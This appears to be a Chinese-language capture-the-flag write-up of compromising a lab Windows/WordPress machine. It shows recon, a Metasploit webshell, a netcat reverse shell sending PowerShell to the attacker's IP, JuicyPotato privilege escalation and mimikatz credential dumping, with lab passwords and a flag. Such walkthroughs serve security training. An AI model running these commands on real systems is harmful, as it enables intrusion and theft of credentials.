目标网站ip:10.10.10.29最终目的:拿到flag,提升到管理员权限。

一:起手访问网页,nmap跑一下

发现开放了80和3306俩个端口

二:使用工具dirsearch跑一下目录结构,发现wordpress这个cms,访问一下

发现有个登录页面,根据提示是上个靶场的账号和密码,登录进去

账号:admin

密码:P@s5w0rd!

三:登录进去之后,利用msfconsole获取webshell。

msfconsole                                       //进入kali的metasploit攻击框架

search wp_admin                              //查找wordpress获取webshell的利用模块

use 0                                                //使用编号为0的模块

show options                             //显示设置需要配置的参数

设置参数

成功获得权限,但回连之后特别容易断

查看系统信息

四:解决连接不稳定,上传nc64位到服务器上运行,kali机进行监听

Kaili端就会返回一个cmd命令行

五:因为系统是windows server 2016,此系统容易受到Rotten Potato攻击

用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口

echo START C:inetpubwwwrootwordpresswp-contentuploadsnc64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat

使用多汁的土豆这个工具去执行生成shell.bat,并设置监听端口1111

JP.exe -t * -p C:inetpubwwwrootwordpresswp-contentuploadsnihao.bat -l 1337

但奇怪的是,1111端口一直没有返回监听,可能设置出来问题我就改了端口,改为了4567就返回了shell,提权成功,是管理员权限

六:查看桌面,拿flag:6e9a9fdc6f64e410a68b847bb4b404fa

七:使用mimikatz扫域内其他成员机

上传mimikatz到靶机上去

执行mimikatz命令获取域内账户和密码

获得了一个账号名:sandra   密码:Password1234!

最后修改:2021 年 04 月 27 日 06 : 28 PM